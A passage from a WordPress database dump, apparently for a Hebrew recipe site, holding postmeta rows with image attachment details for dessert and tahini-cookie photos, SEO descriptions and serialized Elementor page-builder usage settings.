פירות'),(1642,338,'_thumbnail_id','339'),(1643,338,'_wp_page_template','default'),(1646,338,'_yoast_wpseo_metadesc','כך תכינו פלטת פירות מדהימה ואיכותית ב 5 דקות עם שילוב של שוקולד מהסוג שאתם אוהבים כל כך'),(1647,338,'_yoast_wpseo_primary_category','7'),(1648,345,'_edit_lock','1563200606:1'),(1649,346,'_wp_attached_file','2019/07/desserts-1868181_640.jpg'),(1650,346,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:426;s:4:\"file\";s:32:\"2019/07/desserts-1868181_640.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"desserts-1868181_640-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"desserts-1868181_640-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:32:\"desserts-1868181_640-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1653,345,'_thumbnail_id','346'),(1654,345,'_edit_last','1'),(1657,345,'_yoast_wpseo_primary_category',''),(1658,348,'_edit_lock','1563365106:1'),(1659,349,'_wp_attached_file','2019/07/עוגיות-טחינה.jpg'),(1660,349,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:847;s:4:\"file\";s:35:\"2019/07/עוגיות-טחינה.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"עוגיות-טחינה-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"עוגיות-טחינה-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"עוגיות-טחינה-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"עוגיות-טחינה-1024x678.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:678;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:32:\"twentyseventeen-thumbnail-avatar\";a:4:{s:4:\"file\";s:35:\"עוגיות-טחינה-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1663,348,'_edit_last','1'),(1666,348,'_yoast_wpseo_primary_category',''),(1667,297,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:4:{s:5:\"title\";i:3;s:11:\"header_size\";i:3;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:25:\"typography_text_transform\";i:3;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:2;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:2;}s:18:\"section_text_style\";a:6:{s:10:\"text_color\";i:2;s:11:\"text_indent\";i:2;s:26:\"icon_typography_typography\";i:2;s:25:\"icon_typography_font_size\";i:2;s:27:\"icon_typography_font_weight\";i:2;s:32:\"icon_typography_font_size_tablet\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:4;s:19:\"_inline_size_tablet\";i:3;s:19:\"_inline_size_mobile\";i:2;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:1;s:13:\"margin_mobile\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:2;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:5:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:11:\"show_labels\";i:1;s:10:\"input_size\";i:1;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:1;s:12:\"button_width\";i:1;s:11:\"button_size\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:1;s:7:\"row_gap\";i:1;s:11:\"label_color\";i:1;s:27:\"label_typography_typography\";i:1;s:26:\"label_typography_font_size\";i:1;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:1;s:27:\"field_typography_typography\";i:1;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:18:\"field_border_width\";i:1;s:19:\"field_border_radius\";i:1;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:1;s:17:\"button_text_color\";i:1;s:28:\"button_typography_typography\";i:1;s:27:\"button_typography_font_size\";i:1;s:29:\"button_typography_font_weight\";i:1;s:32:\"button_typography_text_transform\";i:1;s:20:\"button_border_radius\";i:1;s:29:\"button_background_hover_color\";i:1;s:18:\"button_hover_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:1:{s:16:\"content_position\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;s:25:\"background_gradient_angle\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:1;s:7:\"padding\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:1;}}}}}'),(1669,227,'_elementor_controls_usage','a:4:{s:15:\"theme-site-logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:1;s:12:\"width_mobile\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:12:\"align_mobile\";i:1;s:5:\"image\";i:1;s:5:\"align\";i:1;s:4:\"link\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:1;s:19:\"_inline_size_mobile\";i:2;s:19:\"_inline_size_tablet\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:14:\"section_layout\";a:7:{s:13:\"custom_height\";i:1;s:16:\"content_position\";i:1;s:6:\"height\";i:1;s:20:\"custom_height_mobile\";i:1;s:20:\"custom_height_tablet\";i:1;s:15:\"stretch_section\";i:2;s:3:\"gap\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;s:18:\"background_color_b\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:1;s:14:\"padding_tablet\";i:2;s:14:\"padding_mobile\";i:2;s:7:\"padding\";i:1;}s:15:\"section_effects\";a:1:{s:6:\"sticky\";i:1;}}}}s:8:\"nav-menu\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:7:{s:11:\"align_items\";i:1;s:14:\"animation_line\";i:1;s:14:\"animation_text\";i:1;s:7:\"pointer\";i:1;s:8:\"dropdown\";i:1;s:10:\"full_width\";i:1;s:20:\"animation_background\";i:1;}}s:5:\"style\";a:3:{s:23:\"section_style_main-menu\";a:9:{s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:29:\"pointer_color_menu_item_hover\";i:1;s:26:\"menu_typography_typography\";i:1;s:25:\"menu_typography_font_size\";i:1;s:13:\"pointer_width\";i:1;s:30:\"menu_typography_text_transform\";i:1;s:22:\"color_menu_item_active\";i:1;s:26:\"padding_vertical_menu_item\";i:1;}s:22:\"section_style_dropdown\";a:6:{s:19:\"color_dropdown_item\";i:1;s:30:\"background_color_dropdown_item\";i:1;s:25:\"color_dropdown_item_hover\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;s:30:\"dropdown_typography_typography\";i:1;s:29:\"dropdown_typography_font_size\";i:1;}s:12:\"style_toggle\";a:6:{s:12:\"toggle_color\";i:1;s:18:\"toggle_color_hover\";i:1;s:11:\"toggle_size\";i:1;s:19:\"toggle_border_width\";i:1;s:20:\"toggle_border_radius\";i:1;s:23:\"toggle_background_color\";i:1;}}}}}'),(1670,221,'_elementor_controls_usage','a:3:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:10:\"text_color\";i:1;s:5:\"align\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:14:\"section_layout\";a:1:{s:15:\"stretch_section\";i:1;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}}'),(1671,218,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:4:{s:5:\"title\";i:3;s:11:\"header_size\";i:3;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:25:\"typography_text_transform\";i:3;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:2;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:2;}s:18:\"section_text_style\";a:6:{s:10:\"text_color\";i:2;s:11:\"text_indent\";i:2;s:26:\"icon_typography_typography\";i:2;s:25:\"icon_typography_font_size\";i:2;s:27:\"icon_typography_font_weight\";i:2;s:32:\"icon_typography_font_size_tablet\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:3;s:19:\"_inline_size_tablet\";i:3;s:19:\"_inline_size_mobile\";i:2;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:1;s:13:\"margin_mobile\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:5:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:11:\"show_labels\";i:1;s:10:\"input_size\";i:1;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:1;s:12:\"button_width\";i:1;s:11:\"button_size\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:1;s:7:\"row_gap\";i:1;s:11:\"label_color\";i:1;s:27:\"label_typography_typography\";i:1;s:26:\"label_typography_font_size\";i:1;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:1;s:27:\"field_typography_typography\";i:1;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:18:\"field_border_width\";i:1;s:19:\"field_border_radius\";i:1;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:1;s:17:\"button_text_color\";i:1;s:28:\"button_typography_typography\";i:1;s:27:\"button_typography_font_size\";i:1;s:29:\"button_typography_font_weight\";i:1;s:32:\"button_typography_text_transform\";i:1;s:20:\"button_border_radius\";i:1;s:29:\"button_background_hover_color\";i:1;s:18:\"button_hover_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}}}}'),(1672,215,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:4:{s:5:\"title\";i:3;s:11:\"header_size\";i:3;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:3;s:21:\"typography_typography\";i:3;s:20:\"typography_font_size\";i:3;s:22:\"typography_font_weight\";i:3;s:25:\"typography_text_transform\";i:3;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:2;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:2;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:2;}s:18:\"section_text_style\";a:6:{s:10:\"text_color\";i:2;s:11:\"text_indent\";i:2;s:26:\"icon_typography_typography\";i:2;s:25:\"icon_typography_font_size\";i:2;s:27:\"icon_typography_font_weight\";i:2;s:32:\"icon_typography_font_size_tablet\";i:2;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:4;s:19:\"_inline_size_tablet\";i:3;s:19:\"_inline_size_mobile\";i:2;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:1;s:13:\"margin_mobile\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:2;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:12:\"align_tablet\";i:1;s:12:\"align_mobile\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:5:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:11:\"show_labels\";i:1;s:10:\"input_size\";i:1;}s:21:\"section_submit_button\";a:3:{s:11:\"button_text\";i:1;s:12:\"button_width\";i:1;s:11:\"button_size\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_form_style\";a:5:{s:10:\"column_gap\";i:1;s:7:\"row_gap\";i:1;s:11:\"label_color\";i:1;s:27:\"label_typography_typography\";i:1;s:26:\"label_typography_font_size\";i:1;}s:19:\"section_field_style\";a:6:{s:16:\"field_text_color\";i:1;s:27:\"field_typography_typography\";i:1;s:26:\"field_typography_font_size\";i:1;s:28:\"field_typography_font_weight\";i:1;s:18:\"field_border_width\";i:1;s:19:\"field_border_radius\";i:1;}s:20:\"section_button_style\";a:9:{s:23:\"button_background_color\";i:1;s:17:\"button_text_color\";i:1;s:28:\"button_typography_typography\";i:1;s:27:\"button_typography_font_size\";i:1;s:29:\"button_typography_font_weight\";i:1;s:32:\"button_typography_text_transform\";i:1;s:20:\"button_border_radius\";i:1;s:29:\"button_background_hover_color\";i:1;s:18:\"button_hover_color\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}s:14:\"section_layout\";a:1:{s:16:\"content_position\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;s:25:\"background_gradient_angle\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:1;s:7:\"padding\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:1;}}}}}'),(1673,212,'_elementor_controls_usage','a:3:{s:8:\"nav-menu\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:7:{s:11:\"align_items\";i:1;s:14:\"animation_line\";i:1;s:14:\"animation_text\";i:1;s:7:\"pointer\";i:1;s:8:\"dropdown\";i:1;s:10:\"full_width\";i:1;s:20:\"animation_background\";i:1;}}s:5:\"style\";a:3:{s:23:\"section_style_main-menu\";a:9:{s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:29:\"pointer_color_menu_item_hover\";i:1;s:26:\"menu_typography_typography\";i:1;s:25:\"menu_typography_font_size\";i:1;s:13:\"pointer_width\";i:1;s:30:\"menu_typography_text_transform\";i:1;s:22:\"color_menu_item_active\";i:1;s:26:\"padding_vertical_menu_item\";i:1;}s:22:\"section_style_dropdown\";a:6:{s:19:\"color_dropdown_item\";i:1;s:30:\"background_color_dropdown_item\";i:1;s:25:\"color_dropdown_item_hover\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;s:30:\"dropdown_typography_typography\";i:1;s:29:\"dropdown_typography_font_size\";i:1;}s:12:\"style_toggle\";a:6:{s:12:\"toggle_color\";i:1;s:18:\"toggle_color_hover\";i:1;s:11:\"toggle_size\";i:1;s:19:\"toggle_border_width\";i:1;s:20:\"toggle_border_radius\";i:1;s:23:\"toggle_background_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:19:\"_inline_size_mobile\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:5:\"style\";a:1:{s:18:\"section_background\";a:3:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;s:18:\"background_color_b\";i:1;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:3:{s:7:\"padding\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:1;}s:15:\"section_effects\";a:1:{s:6:\"sticky\";i:1;}}s:6:\"layout\";a:1:{s:14:\"section_layout\";a:2:{s:3:\"gap\";i:1;s:15:\"stretch_section\";i:1;}}}}}'),(1674,209,'_elementor_controls_usage','a:3:{s:15:\"theme-site-logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:1;s:12:\"width_mobile\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:12:\"align_mobile\";i:1;s:5:\"image\";i:1;s:5:\"align\";i:1;s:4:\"link\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:1;s:19:\"_inline_size_mobile\";i:1;s:19:\"_inline_size_tablet\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:1:{s:14:\"section_layout\";a:6:{s:13:\"custom_height\";i:1;s:16:\"content_position\";i:1;s:6:\"height\";i:1;s:20:\"custom_height_mobile\";i:1;s:20:\"custom_height_tablet\";i:1;s:15:\"stretch_section\";i:1;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:1;s:12:\"border_width\";i:1;s:12:\"border_color\";i:1;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:3:{s:6:\"margin\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:1;}}}}}'),(1675,203,'_elementor_controls_usage','a:10:{s:15:\"theme-site-logo\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_style_image\";a:2:{s:5:\"width\";i:1;s:12:\"width_mobile\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:12:\"align_mobile\";i:1;s:5:\"image\";i:1;s:5:\"align\";i:1;s:4:\"link\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:11;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:9;s:19:\"_inline_size_mobile\";i:4;s:19:\"_inline_size_tablet\";i:4;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:4:{s:13:\"margin_tablet\";i:1;s:13:\"margin_mobile\";i:1;s:14:\"padding_tablet\";i:1;s:14:\"padding_mobile\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:3;s:8:\"controls\";a:3:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:7:{s:13:\"custom_height\";i:1;s:16:\"content_position\";i:2;s:6:\"height\";i:1;s:20:\"custom_height_mobile\";i:1;s:20:\"custom_height_tablet\";i:1;s:3:\"gap\";i:1;s:15:\"stretch_section\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:3;}}s:5:\"style\";a:2:{s:18:\"section_background\";a:4:{s:21:\"background_background\";i:5;s:16:\"background_color\";i:5;s:18:\"background_color_b\";i:2;s:25:\"background_gradient_angle\";i:1;}s:14:\"section_border\";a:3:{s:13:\"border_border\";i:2;s:12:\"border_width\";i:2;s:12:\"border_color\";i:2;}}s:8:\"advanced\";a:2:{s:16:\"section_advanced\";a:4:{s:6:\"margin\";i:2;s:14:\"padding_tablet\";i:3;s:14:\"padding_mobile\";i:3;s:7:\"padding\";i:2;}s:15:\"section_effects\";a:1:{s:6:\"sticky\";i:1;}}}}s:8:\"nav-menu\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:8;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_layout\";a:7:{s:11:\"align_items\";i:1;s:14:\"animation_line\";i:1;s:14:\"animation_text\";i:1;s:7:\"pointer\";i:1;s:8:\"dropdown\";i:1;s:10:\"full_width\";i:1;s:20:\"animation_background\";i:1;}}s:5:\"style\";a:3:{s:23:\"section_style_main-menu\";a:9:{s:15:\"color_menu_item\";i:1;s:21:\"color_menu_item_hover\";i:1;s:29:\"pointer_color_menu_item_hover\";i:1;s:26:\"menu_typography_typography\";i:1;s:25:\"menu_typography_font_size\";i:1;s:13:\"pointer_width\";i:1;s:30:\"menu_typography_text_transform\";i:1;s:22:\"color_menu_item_active\";i:1;s:26:\"padding_vertical_menu_item\";i:1;}s:22:\"section_style_dropdown\";a:6:{s:19:\"color_dropdown_item\";i:1;s:30:\"background_color_dropdown_item\";i:1;s:25:\"color_dropdown_item_hover\";i:1;s:36:\"background_color_dropdown_item_hover\";i:1;s:30:\"dropdown_typography_typography\";i:1;s:29:\"dropdown_typography_font_size\";i:1;}s:12:\"style_toggle\";a:6:{s:12:\"toggle_color\";i:1;s:18:\"toggle_color_hover\";i:1;s:11:\"toggle_size\";i:1;s:19:\"toggle_border_width\";i:1;s:20:\"toggle_border_radius\";i:1;s:23:\"toggle_background_color\";i:1;}}}}s:11:\"breadcrumbs\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:27:\"section_breadcrumbs_content\";a:1:{s:5:\"align\";i: